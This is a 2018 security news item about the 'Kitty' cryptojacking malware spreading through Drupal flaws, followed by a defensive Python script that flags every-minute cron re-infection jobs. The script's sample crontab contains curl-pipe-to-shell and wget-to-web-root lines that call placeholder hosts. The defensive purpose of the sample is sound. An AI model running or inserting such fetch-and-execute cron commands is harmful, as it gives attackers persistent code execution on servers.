Drupal Flaws Exploited for Hosting Crypto-Jacking Malware Kitty
A series of high-severity security flaws affecting Drupal, revealed in April 2018, is currently being exploited in widespread attacks by a malware scheme. Troy Mursch, a security researcher at Bad Packets Report, recently identified a few hundred hijacked Drupal websites that were being used to host 'crypto-jacking' malware, which consumes the CPU of infected systems to mine digital currency through CoinHive.
Mursch closely examined a particular domain name to which each of the infected websites pointed and discovered that the e-mail address used was connected to some other domain registrations. The researcher scanned over 100,000 websites and found that 348 of them were infected. Arnnet.com posted this on May 9, 2018.
By exploiting the flaw, hackers can use more than one attack vector to completely hijack Drupal websites. They can then embed crypto-mining code, steal data, or even shut the websites down. Cyber-criminals abuse the flaw as an entry point for deploying the Kitty malware, which they then install into Drupal's setup files. Notably, Kitty uses "Webminerpool", open-source mining software built for web browsers.
As soon as a website is infected, the Drupal flaw is triggered, letting the attacker place a backdoor on the victim's computer. The malware is crafted so that a time-based job scheduler runs the code every minute, leading to continuously recurring infections. This feature also lets the attackers push updates for Kitty.
Most of the affected websites are hosted on Amazon and located in the USA. Mursch is confident that those websites were hijacked via an obsolete Drupal version. Government websites in Mexico, the USA, South Africa, Peru, Italy and Turkey have also been affected.
Security investigators contend that the attackers are extremely organized, since Kitty's initial version was 1.5 and the latest is 1.6. The cyber-criminals update their malware by adding new features that make their attacks more robust.
Meanwhile, ever since Drupal warned in March that more than 1m websites running Drupal were affected by the flaw, a number of botnets, exploits and crypto-mining malware have emerged.
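An added example (not from the original article) of how a defender could spot the every-minute re-infection job described above: it scans a crontab for jobs that fire every minute and download remote content to execute or save to disk. It assumes the scheduler is Unix cron in user-crontab format; the sample crontab, hostnames, paths and matching heuristics are constructed for illustration.

```python
import re

# Minute field values that mean "every minute".
EVERY_MINUTE = re.compile(r"^(\*|\*/1)$")
# Heuristic (assumed, not from the article): command downloads from a URL.
FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*https?://", re.I)
# Download is piped to an interpreter or saved to a file (not /dev/null, not 2>&1).
EXEC_OR_WRITE = re.compile(
    r"\|\s*(sh|bash|php|python\d?)\b|(?:\s-[oO]|>)\s*(?![&]|/dev/null)\S+")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def parse_crontab(text):
    """Yield (line_no, five schedule fields, command) for each job line."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        # Skip blanks, comments, env assignments and @reboot/@hourly shortcuts.
        if not line or line[0] in "#@" or ENV_LINE.match(line):
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield no, parts[:5], parts[5]

def flag_reinfection_jobs(text):
    """Return (line_no, command) for every-minute jobs that fetch and run/write code."""
    findings = []
    for no, sched, cmd in parse_crontab(text):
        every_minute = EVERY_MINUTE.match(sched[0]) and all(f == "*" for f in sched[1:])
        if every_minute and FETCH.search(cmd) and EXEC_OR_WRITE.search(cmd):
            findings.append((no, cmd))
    return findings

# Constructed sample crontab; hosts and paths are placeholders.
SAMPLE = """\
# web server account
MAILTO=""
*/5 * * * * /usr/bin/php /var/www/html/cron.php
* * * * * curl -s http://updates.example.invalid/k.sh | sh
*/1 * * * * wget -q -O /var/www/html/x.php http://updates.example.invalid/x
* * * * * curl -s https://monitor.example.invalid/ping > /dev/null 2>&1
0 3 * * * curl -s http://updates.example.invalid/k.sh | bash
"""

if __name__ == "__main__":
    for no, cmd in flag_reinfection_jobs(SAMPLE):
        print(f"line {no}: suspicious every-minute job: {cmd}")
```

Because such a job reinstalls the payload every minute, cleaning the web root without removing the scheduler entry first will not hold.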
» SPAMfighter News - 5/16/2018